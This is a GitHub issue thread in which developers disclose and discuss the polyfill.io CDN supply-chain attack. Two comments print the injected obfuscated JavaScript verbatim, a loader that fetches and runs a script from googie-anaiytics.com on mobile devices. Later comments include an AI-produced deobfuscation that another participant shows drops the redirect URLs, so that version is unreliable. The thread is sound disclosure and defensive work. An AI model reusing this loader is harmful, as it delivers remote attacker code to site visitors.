### ISSUE TITLE
polyfill.io domain owner

### ISSUE THREAD

**Issue by mustafa0x** [JakeChampion/polyfill-service#2873]
https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk

> following the transition of the domain polyfill.io to a new provider (Funnull).

Is this still the case? The repo doesn't mention anything.

**Comment by hmmhmmhm** [comment]
My initial issue posted on this GitHub repository was deleted without any notification and against my wishes. Below is the issue post where I first mentioned the Polykill incident.
https://web.archive.org/web/20240229113710/https://github.com/polyfillpolyfill/polyfill-service/issues/2834

I expect your post will be deleted soon as well.

Recently, several developers have reported that polyfill.io is sending redirection code to specific wallet sites or delivering ambiguous eval code. I strongly recommend not using polyfill.io and instead suggest either self-hosting the repository or using services from trusted providers like Cloudflare.
https://x.com/nabigraphics/status/1796389736350929082

**Comment by hmmhmmhm** [comment]
@ashtom @mph4

We desperately need help here.

GitHub needs to investigate this [“Polykill”](https://polykill.io/ ) situation. It appears that the rights to a large open source site and repository have been sold to a company with ties to China and are being utilized to distribute malware.

They appear to have bought the rights and privileges to the GitHub repo from the original author for money and are abusing them, deleting all relevant discussions without authorization so that legitimate debate cannot take place.

[Cloudflare](https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk), upon becoming aware of this incident, has already addressed it and has been providing alternative services since February.  And i'm wondering if GitHub can provide any solutions to this problem, as they are currently deleting all discussions to prevent legitimate discussions from taking place.

There are tens of thousands of companies and organizations using polyfill.io around the world, and all of them are exposed to a serious and potentially large security breach due to this issue.

Could you please restore the security-related discussions? It appears that a large-scale security attack is currently underway, and it seems necessary to issue security warnings related to this situation.

**Comment by ehechtor** [comment]
Hi @hmmhmmhm 

My name is Eric and I work at GitHub.  Mike Hanley contacted my team about your above post.  Could you please open up a support request with the GitHub support team via our support [portal](https://support.github.com/) and provide me the 7 digit ticket number?  I will have our support team investigate this issue once you have provided me the ticket number ASAP.

Thank you!

**Comment by shuuji3** [comment]
@hmmhmmhm @ehechtor Thank you for taking care. Please also refer to the newer captures of the deleted GitHub Issue, which contains several additional comments: https://web.archive.org/web/20240314202054/https://github.com/polyfillpolyfill/polyfill-service/issues/2834

I feel like this threat has not yet been widely recognized by many developers so there is still a lot of usage of polyfill.io remains publicly.

I'm wondering if GitHub can use CodeQL to scan and detect the usage of this domain and issue a security alert to the entire GitHub public repository. However, I'm unsure if CodeQL covers this kind of domain usage issue, not only insecure code scanning.

(Please let me tag @triblondon (Fastly) and @xtuc (Cloudflare) for visibility in case they haven't noticed the deletion of the original GitHub Issue. They are kindly providing us with alternative CDNs.)

**Comment by ehechtor** [comment]
Hi @shuuji3

Thank you for the additional info but still going to need someone to open up a support request ticket before GitHub support can begin their investigation into this.  Once I have the ticket number I can engage the team on my side so one of our support engineers is assigned to it and begin their investigation.

Thank you!

Eric

**Comment by hmmhmmhm** [comment]
@ehechtor 
Hi, I just checked and opened a ticket. It's 2822233

**Comment by ehechtor** [comment]
Thank you @hmmhmmhm!  I've contacted one of our internal support teams to have someone take ownership of the ticket you created and they will begin conducting their investigation.  All further communications concerning this issue will be managed within the ticket and not via this issue.

Thank you.

Eric

**Comment by alitonia** [comment]
Hello fellow humans, I also encounter malicious code injected by the polyfill's cdn.

For specific details:
* The compromised url is: https://cdn.polyfill.io/v2/polyfill.min.js
* Behavior: The first time a user open a website through an ads ( google ads or facebook ) with this link, it will redirect user to a malicious website.
* How it works:
   * The request send to https://cdn.polyfill.io/v2/polyfill.min.js needs to match the following format:
       *  Request for the first time from a unique IP.
       * User-Agent match that of a phone, we used an iphone's user agent.
       * Referer from a reputable website that installed polyfill.
       * Accept  \*/\*
       * Accept-Encoding gzip, deflate, br, zstd
   * The request will return the original polyfill code, appended with a piece of malicious code. This code will make a run javascript from https://www.googie-anaiytics.com/ga.js , if the device is not a laptop.

```
function MqMqY(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t
}

function HHwbhL(e){
var m='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}return MqMqY(t)
}

eval('window')['klodTq']=function(){;(function(u,r,w,d,f,c){var x=HHwbhL;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));'jQuery';k=r[2]+'c'+f[1];'Flex';v=k+f[6];var s=d.createElement(v+c[0]+c[1]),g=function(){};s.type='text/javascript';{s.onload=function(){g()}}s.src=u;'CSS';d.getElementsByTagName('head')[0].appendChild(s)})('aHR0cHM6Ly93d3cuZ29vZ2llLWFuYWl5dGljcy5jb20vZ2EuanM=','gUssQxWzjLAD',window,document,'DrPdgDiahyku','ptsrhUDHCv')};


if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) klodTq();
```
   * The javascript on https://www.googie-anaiytics.com/ga.js will redirect users to a malicious website based on some condition. I cannot check this further due to the lack of time. The content of [gooie](https://www.googie-anaiytics.com/ga.js) is here https://pastebin.com/hAgtHd70 in case they delete it.

I hope you guys can resolve this problem soon because this cdn is used by many people @ehechtor .

**Comment by alitonium** [comment]
\* I previously have to delete this comment for some personal issues, but now I put it back here so others who have the same problem can search it up.
Hello fellow humans, I also encounter malicious code injected by the polyfill's cdn.

For specific details:

* The compromised url is: https://cdn.polyfill.io/v2/polyfill.min.js
* Behavior: The first time a user, who uses a phone, open a website through an ads ( google ads or facebook ) with this link, it will redirect user to a malicious website.
* How it works:
   * The request send to https://cdn.polyfill.io/v2/polyfill.min.js needs to match the following format:
   * Request for the first time from a unique IP, with a unique User-Agent.
   * User-Agent match that of a phone, we used an iphone's user agent ( Mozilla/5.0 (iPhone14,2; U; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/15E148 Safari/602.1 ).
   * Referer from a reputable website that installed polyfill.
   * Accept */*
   * Accept-Encoding gzip, deflate, br, zstd
   * Delete all cookies

The request will return the original polyfill code, appended with a piece of malicious code. This code will make a run javascript from https://www.googie-anaiytics.com/ga.js , if the device is not a laptop.
You can reproduce this multiple time on the same machine by changing User agent gently, (ex: change __Mozilla/5.0__ to __Mozilla/6.0__). Sometimes the server will just timeout or return code without the injection, but it should work most of the time.

Below is the injected code


function MqMqY(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3}}return t
}

function HHwbhL(e){
var m='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r)}if(a!=64){t=t+String.fromCharCode(i)}}return MqMqY(t)
}

eval('window')['klodTq']=function(){;(function(u,r,w,d,f,c){var x=HHwbhL;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));'jQuery';k=r[2]+'c'+f[1];'Flex';v=k+f[6];var s=d.createElement(v+c[0]+c[1]),g=function(){};s.type='text/javascript';{s.onload=function(){g()}}s.src=u;'CSS';d.getElementsByTagName('head')[0].appendChild(s)})('aHR0cHM6Ly93d3cuZ29vZ2llLWFuYWl5dGljcy5jb20vZ2EuanM=','gUssQxWzjLAD',window,document,'DrPdgDiahyku','ptsrhUDHCv')};


if( !(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf('.') !== -1) ) klodTq();

The javascript on https://www.googie-anaiytics.com/ga.js will redirect users to a malicious website based on some condition. I cannot check this further due to the lack of time. The content of gooie is here https://pastebin.com/hAgtHd70 in case they delete it.

The code check for a number of conditions before running ( useragent, screen width, ...) to ensure it is a phone, the entry point is at the end:


bdtjfg||cnzfg||wolafg||mattoo||aanaly||ggmana||aplausix||statcct?setTimeout(check_tiaozhuan,-0x4*0x922+0x1ebd+0xd9b):check_tiaozhuan();


The code has some protection built-in, so if it is run on a non-suitable environment, it will attempt to relocate a lot of memory to freeze the current devices. It also re-translate all attribute name access with __\_0x42bcd7__ .

At this point I think we can definitely conclude that the is a compromised CDN without having to further dig into the remaining obfuscated code.

**Comment by anoncam** [comment]
https://sansec.io/research/polyfill-supply-chain-attack

**Comment by spmedia** [comment]
> Hi @shuuji3
> 
> Thank you for the additional info but still going to need someone to open up a support request ticket before GitHub support can begin their investigation into this. Once I have the ticket number I can engage the team on my side so one of our support engineers is assigned to it and begin their investigation.
> 
> Thank you!
> 
> Eric

https://www.bleepingcomputer.com/news/security/polyfillio-javascript-supply-chain-attack-impacts-over-100k-sites/

Please nuke this entire project from Github ASAP

**Comment by JLarky** [comment]
as a hotfix you can just use CDN from [Fastly](https://community.fastly.com/t/new-options-for-polyfill-io-users/2540) or [Cloudflare](https://cdnjs.cloudflare.com/polyfill/)

**Comment by goulashsoup** [comment]
> Please nuke this entire project from Github ASAP

I would also expect github todo that, isn't that against github rules?

Not to mention that github might be legally accountable too...

**Comment by jhfdevelop** [comment]
Hey there,

first of all thank you for all the research here and in the other issues as well.

I only very recently (today) learned about the supply chain attack and would like to ask a (probably very stupid) question:

why is the DNS record of `cdn[.]polyfill[.]io` pointing to the CNAME record `cdn[.]polyfill[.]io[.]cdn[.]cloudflare[.]net`?

Is this legit (e.g. a mitigation effort) or could there be malicious intent behind this as well?

If my understanding is correct, then according to `polykill.io` it should (at least at some point) have pointet to Baishan Cloud CDN?

What confuses me about the CNAME  is that Cloudflare is serving their mirror on `cdnjs[.]cloudflare[.]com` since February.
On the other hand I highly doubt anyone at cloudflare would allow this to continue for a long time.

**Comment by n0099** [comment]
> Is this legit (e.g. a mitigation effort) or could there be malicious intent behind this as well?

No.
https://news.ycombinator.com/item?id=40804526
https://github.com/polyfillpolyfill/polyfill-service/commit/2ba06045ce67295f622ee79f6fa6b43c13e37d27 [<sup>archive</sup>](https://web.archive.org/web/20240324114710/https://github.com/polyfillpolyfill/polyfill-service/commit/2ba06045ce67295f622ee79f6fa6b43c13e37d27)
https://twitter.com/Polyfill_Global/status/1764285622372733047 [<sup>archive</sup>](https://web.archive.org/web/20240626225913/https://twitter.com/Polyfill_Global/status/1764285622372733047)

**Comment by jhfdevelop** [comment]
Thank you @n0099. sorry for not looking at the readme.

**Comment by TheBarret** [comment]
Just for sh*t and giggles, i posted the obfuscated javascript to an AI, just to see what would happen,
I hope it maybe helps your cause, if unwanted you can delete it. Just my 2-cents :>

```
Thank you for providing this obfuscated JavaScript code for analysis.
I understand this code is suspected to be malicious, 
so I'll analyze it carefully to determine its likely intent and functionality. 

Here's my assessment:

1. Obfuscation: The code is heavily obfuscated using various techniques like string encoding,
   variable name randomization, and control flow obfuscation.
   This is a common tactic used to hide malicious functionality and evade detection.


3. Key Functions:
   - `loadJS`: Loads external JavaScript files dynamically.
   - `isPc`: Detects if the user is on a PC or mobile device.
   - `vfed_update`: Appears to redirect users to a specific URL under certain conditions.
   - `check_tiaozhuan`: The main function that orchestrates the malicious behavior.


4. Malicious Behavior:
   - The code checks for the presence of various analytics services (Baidu, CNZZ, Google Analytics, etc.).
   - If these services are not detected, it immediately runs `check_tiaozhuan()`.
   - If they are detected, it waits 2 seconds before running `check_tiaozhuan()`.
   - The `check_tiaozhuan()` function:
     - Targets mobile users specifically.
     - Checks the current time and uses a random number to determine if redirection should occur.
     - The redirection URL is "https://kuurza.com/redirect?from=bitget".
     - It avoids redirecting users with admin cookies.


5. Intent:
   The primary intent of this code appears to be unauthorized redirection of mobile users to a potentially malicious or fraudulent website.
   It's likely part of a traffic hijacking or phishing scheme.


6. Additional Concerns:
   - The code loads an external JavaScript file from "https://www.googie-anaiytics.com/html/checkcachehw.js" (note the misspelling of "google"),
     which could contain additional malicious code.
   - The redirection URL (kuurza.com) is suspicious and likely not legitimate.


7. Evasion Techniques:
   - Time-based execution to avoid immediate detection.
   - Checking for analytics services to potentially bypass security checks.
   - Using randomization to make the behavior less predictable.


In conclusion, this code is indeed malicious. Its primary purpose appears to be hijacking mobile traffic and redirecting users to a potentially harmful website.
The obfuscation and evasion techniques employed suggest a sophisticated attempt to avoid detection while carrying out unauthorized and potentially harmful actions on users' devices.```

**Comment by PhialsBasement** [comment]
> Just for sh*t and giggles, i posted the obfuscated javascript to an AI, just to see what would happen, I hope it maybe helps your cause, if unwanted you can delete it. Just my 2-cents :>
> 
> ```
> Thank you for providing this obfuscated JavaScript code for analysis.
> I understand this code is suspected to be malicious, 
> so I'll analyze it carefully to determine its likely intent and functionality. 
> 
> Here's my assessment:
> 
> 1. Obfuscation: The code is heavily obfuscated using various techniques like string encoding,
>    variable name randomization, and control flow obfuscation.
>    This is a common tactic used to hide malicious functionality and evade detection.
> 
> 
> 3. Key Functions:
>    - `loadJS`: Loads external JavaScript files dynamically.
>    - `isPc`: Detects if the user is on a PC or mobile device.
>    - `vfed_update`: Appears to redirect users to a specific URL under certain conditions.
>    - `check_tiaozhuan`: The main function that orchestrates the malicious behavior.
> 
> 
> 4. Malicious Behavior:
>    - The code checks for the presence of various analytics services (Baidu, CNZZ, Google Analytics, etc.).
>    - If these services are not detected, it immediately runs `check_tiaozhuan()`.
>    - If they are detected, it waits 2 seconds before running `check_tiaozhuan()`.
>    - The `check_tiaozhuan()` function:
>      - Targets mobile users specifically.
>      - Checks the current time and uses a random number to determine if redirection should occur.
>      - The redirection URL is "https://kuurza.com/redirect?from=bitget".
>      - It avoids redirecting users with admin cookies.
> 
> 
> 5. Intent:
>    The primary intent of this code appears to be unauthorized redirection of mobile users to a potentially malicious or fraudulent website.
>    It's likely part of a traffic hijacking or phishing scheme.
> 
> 
> 6. Additional Concerns:
>    - The code loads an external JavaScript file from "https://www.googie-anaiytics.com/html/checkcachehw.js" (note the misspelling of "google"),
>      which could contain additional malicious code.
>    - The redirection URL (kuurza.com) is suspicious and likely not legitimate.
> 
> 
> 7. Evasion Techniques:
>    - Time-based execution to avoid immediate detection.
>    - Checking for analytics services to potentially bypass security checks.
>    - Using randomization to make the behavior less predictable.
> 
> 
> In conclusion, this code is indeed malicious. Its primary purpose appears to be hijacking mobile traffic and redirecting users to a potentially harmful website.
> The obfuscation and evasion techniques employed suggest a sophisticated attempt to avoid detection while carrying out unauthorized and potentially harmful actions on users' devices.```
> ```


I did something similiar and it was able to fully deobfuscate the code. Here it is:
[The code on pastebin](https://pastebin.com/akiVgC9L)

**Comment by TheBarret** [comment]
> I did something similiar and it was able to fully deobfuscate the code. Here it is:
> 
> ```
> let tsastr = document.getElementsByTagName('head')[0].innerText,
>     bdtjfg = tsastr.indexOf('https://bd-tj.com') != -1;
> 
> let cnzfg = tsastr.indexOf('https://ia.51.la') != -1,
>     wolafg = tsastr.indexOf('https://v6.51.la') != -1;
> 
> let mattoo = tsastr.indexOf('https://js.users.51.la') != -1,
>     aanaly = tsastr.indexOf('https://hm.baidu.com') != -1;
> 
> let ggmana = tsastr.indexOf('https://www.googletagmanager.com') != -1,
>     aplausix = tsastr.indexOf('https://track.aplausix.com') != -1,
>     statcct = tsastr.indexOf('https://statcounter.com') != -1;
> 
> if (bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct) {
>     setTimeout(check_tiaozhuan, 500);
> } else {
>     check_tiaozhuan();
> }
> 
> function loadJS(url, callback) {
>     let script = document.createElement('script');
>     script.onload = callback || function() {};
>     script.onerror = function() {};
> 
>     {
>         script.onload = function() {
>             callback();
>         };
>     }
> 
>     script.src = url;
>     document.getElementsByTagName('head')[0].appendChild(script);
> }
> 
> function isPc() {
>     let userAgentInfo = navigator.userAgent.toLowerCase();
>     let Agents = ["phone", "pad", "pod", "iphone", "ipod", "ios", "ipad", "android", "mobile", "blackberry", "iemobile", "mqqbrowser", "juc", "fennec", "wosbrowser", "browserng", "webos", "symbian", "windows phone"];
>     let flag = true;
>     for (let v = 0; v < Agents.length; v++) {
>         if (userAgentInfo.indexOf(Agents[v]) > 0) {
>             flag = false;
>             break;
>         }
>     }
>     return flag;
> }
> 
> function vfed_update(url) {
>     url != '' && isPc() && loadJS(url, function() {
>         if (usercache === true) {
>             window.location.href = url;
>         }
>     });
> }
> 
> function check_tiaozhuan() {
>     try {
>         let userAgentInfo = navigator.userAgent.toLowerCase();
>         let isMobile = !isPc();
>         let tiaourl = '',
>             ystr = 'bing.com',
>             tiaoshu = Math.floor(Math.random() * (100000 - 10000) + 10000),
>             myDate = new Date(),
>             goumai = myDate.getMinutes();
> 
>         if (tiaourl.indexOf('hao123.com') != -1 || tiaourl.indexOf('hao360.com') != -1) {
>             tiaourl = '';
>         } else {
>             if (tiaourl.indexOf('.') == -1 && tiaourl.indexOf('.') == -1 && tiaourl == location.hostname) {
>                 tiaourl = 'https://www.bing.com';
>             } else {
>                 if (goumai >= 0 && goumai <= 30) {
>                     if (tiaoshu <= 50000) {
>                         tiaourl = ystr;
>                     }
>                 } else if (goumai > 30 && goumai <= 45) {
>                     if (tiaoshu >= 10000 && tiaoshu < 30000) {
>                         tiaourl = ystr;
>                     }
>                 } else if (goumai > 45 && goumai <= 53) {
>                     if (tiaoshu >= 30000 && tiaoshu < 60000) {
>                         if (tiaourl.indexOf('microsoft.com') != -1 || tiaourl.indexOf('apple.com') != -1) {
>                             return !![];
>                         } else {
>                             tiaourl = ystr;
>                         }
>                     }
>                 } else {
>                     if (tiaourl.indexOf('.') == -1 && tiaourl.indexOf('.') == -1) {
>                         tiaourl = 'https://www.office.com';
>                     } else {
>                         if (goumai >= 54 && goumai <= 56) {
>                             if (tiaourl.indexOf('microsoft.com') != -1 || tiaourl.indexOf('apple.com') != -1 || tiaourl.indexOf('bing.com') != -1) {
>                                 return !![];
>                             } else {
>                                 tiaourl = ystr;
>                             }
>                         } else {
>                             if (tiaourl == 'https://www.microsoftedgeinsider.com') {
>                                 tiaourl = 'https://www.office.com';
>                             } else if (goumai >= 57 && goumai <= 59) {
>                                 if (tiaourl != location.hostname) {
>                                     return !![];
>                                 } else {
>                                     tiaourl = ystr;
>                                 }
>                             }
>                         }
>                     }
>                 }
>             }
>         }
> 
>         tiaourl != '' && !isPc() && (document.referrer.indexOf("baidu.com") != -1 && document.referrer.indexOf("hao123.com") != -1 && vfed_update(tiaourl));
>     } catch (e) {
>         return !![];
>     }
> }````
> ```

Interesting and thanks, i fed your version as well, it wasn't quite sure as to what this was.

```
AI: The presence of redirects to legitimate Microsoft and Apple domains suggests this might be a form
of traffic direction script, possibly for affiliate marketing or user acquisition,
rather than outright malicious redirection as seen in the first version.```

**Comment by PhialsBasement** [comment]
> > I did something similiar and it was able to fully deobfuscate the code. Here it is:
> > ```
> > let tsastr = document.getElementsByTagName('head')[0].innerText,
> >     bdtjfg = tsastr.indexOf('https://bd-tj.com') != -1;
> > 
> > let cnzfg = tsastr.indexOf('https://ia.51.la') != -1,
> >     wolafg = tsastr.indexOf('https://v6.51.la') != -1;
> > 
> > let mattoo = tsastr.indexOf('https://js.users.51.la') != -1,
> >     aanaly = tsastr.indexOf('https://hm.baidu.com') != -1;
> > 
> > let ggmana = tsastr.indexOf('https://www.googletagmanager.com') != -1,
> >     aplausix = tsastr.indexOf('https://track.aplausix.com') != -1,
> >     statcct = tsastr.indexOf('https://statcounter.com') != -1;
> > 
> > if (bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct) {
> >     setTimeout(check_tiaozhuan, 500);
> > } else {
> >     check_tiaozhuan();
> > }
> > 
> > function loadJS(url, callback) {
> >     let script = document.createElement('script');
> >     script.onload = callback || function() {};
> >     script.onerror = function() {};
> > 
> >     {
> >         script.onload = function() {
> >             callback();
> >         };
> >     }
> > 
> >     script.src = url;
> >     document.getElementsByTagName('head')[0].appendChild(script);
> > }
> > 
> > function isPc() {
> >     let userAgentInfo = navigator.userAgent.toLowerCase();
> >     let Agents = ["phone", "pad", "pod", "iphone", "ipod", "ios", "ipad", "android", "mobile", "blackberry", "iemobile", "mqqbrowser", "juc", "fennec", "wosbrowser", "browserng", "webos", "symbian", "windows phone"];
> >     let flag = true;
> >     for (let v = 0; v < Agents.length; v++) {
> >         if (userAgentInfo.indexOf(Agents[v]) > 0) {
> >             flag = false;
> >             break;
> >         }
> >     }
> >     return flag;
> > }
> > 
> > function vfed_update(url) {
> >     url != '' && isPc() && loadJS(url, function() {
> >         if (usercache === true) {
> >             window.location.href = url;
> >         }
> >     });
> > }
> > 
> > function check_tiaozhuan() {
> >     try {
> >         let userAgentInfo = navigator.userAgent.toLowerCase();
> >         let isMobile = !isPc();
> >         let tiaourl = '',
> >             ystr = 'bing.com',
> >             tiaoshu = Math.floor(Math.random() * (100000 - 10000) + 10000),
> >             myDate = new Date(),
> >             goumai = myDate.getMinutes();
> > 
> >         if (tiaourl.indexOf('hao123.com') != -1 || tiaourl.indexOf('hao360.com') != -1) {
> >             tiaourl = '';
> >         } else {
> >             if (tiaourl.indexOf('.') == -1 && tiaourl.indexOf('.') == -1 && tiaourl == location.hostname) {
> >                 tiaourl = 'https://www.bing.com';
> >             } else {
> >                 if (goumai >= 0 && goumai <= 30) {
> >                     if (tiaoshu <= 50000) {
> >                         tiaourl = ystr;
> >                     }
> >                 } else if (goumai > 30 && goumai <= 45) {
> >                     if (tiaoshu >= 10000 && tiaoshu < 30000) {
> >                         tiaourl = ystr;
> >                     }
> >                 } else if (goumai > 45 && goumai <= 53) {
> >                     if (tiaoshu >= 30000 && tiaoshu < 60000) {
> >                         if (tiaourl.indexOf('microsoft.com') != -1 || tiaourl.indexOf('apple.com') != -1) {
> >                             return !![];
> >                         } else {
> >                             tiaourl = ystr;
> >                         }
> >                     }
> >                 } else {
> >                     if (tiaourl.indexOf('.') == -1 && tiaourl.indexOf('.') == -1) {
> >                         tiaourl = 'https://www.office.com';
> >                     } else {
> >                         if (goumai >= 54 && goumai <= 56) {
> >                             if (tiaourl.indexOf('microsoft.com') != -1 || tiaourl.indexOf('apple.com') != -1 || tiaourl.indexOf('bing.com') != -1) {
> >                                 return !![];
> >                             } else {
> >                                 tiaourl = ystr;
> >                             }
> >                         } else {
> >                             if (tiaourl == 'https://www.microsoftedgeinsider.com') {
> >                                 tiaourl = 'https://www.office.com';
> >                             } else if (goumai >= 57 && goumai <= 59) {
> >                                 if (tiaourl != location.hostname) {
> >                                     return !![];
> >                                 } else {
> >                                     tiaourl = ystr;
> >                                 }
> >                             }
> >                         }
> >                     }
> >                 }
> >             }
> >         }
> > 
> >         tiaourl != '' && !isPc() && (document.referrer.indexOf("baidu.com") != -1 && document.referrer.indexOf("hao123.com") != -1 && vfed_update(tiaourl));
> >     } catch (e) {
> >         return !![];
> >     }
> > }````
> > ```
> 
> Interesting and thanks, i fed your version as well, it wasn't quite sure as to what this was.
> 
> ```
> AI: The presence of redirects to legitimate Microsoft and Apple domains suggests this might be a form
> of traffic direction script, possibly for affiliate marketing or user acquisition,
> rather than outright malicious redirection as seen in the first version.```
> ```

Its probably just meant for user tracking, but still its done via chain attack so i definitely dont think this is innocent.

**Comment by wearrrrr** [comment]
Here is my rendition of the deobfuscation using webcrack as a base. Webcrack gave a slightly different output, but overall the code seems to function identically. This just adds some more comments for understanding and cleans up some of the weird variable names. https://pastebin.com/mbkNeHMq

**Comment by boehs** [comment]
> I did something similiar and it was able to fully deobfuscate the code. Here it is: [The code on pastebin](https://pastebin.com/akiVgC9L)

@PhialsBasement I don't know *how* you did this deobfuscation, but this is the result of programatic deobfuscation:

https://doc.boehs.org/s/c5_mtqlvH

What happened to the URLs like `kuurza` in your result? On first glance, this code has many many dissimilarities with yours.

Edit: @wearrrrr's result seems like a faithful reconstruction, but I really want to know what happened with yours

**Comment by PhialsBasement** [comment]
> > I did something similiar and it was able to fully deobfuscate the code. Here it is: [The code on pastebin](https://pastebin.com/akiVgC9L)
> 
> @PhialsBasement I don't know _how_ you did this deobfuscation, but this is the result of programatic deobfuscation:
> 
> https://doc.boehs.org/s/c5_mtqlvH
> 
> What happened to the URLs like `kuurza` in your result? On first glance, this code has many many dissimilarities with yours.
> 
> Edit: @wearrrrr's result seems like a faithful reconstruction, but I really want to know what happened with yours

i dont know what happened with kuurza urls. Guess they were snapped by thanos.

**Comment by robatwilliams** [comment]
It appears that CSP would have thwarted this attack, even if the policy allowed (as it must have) polyfill.io, because the attack relies on loading a script from googie-anaiytics.com. Whatever that script is for, they could have hosted it on their own domain and avoided self-limiting the reach of their attack.
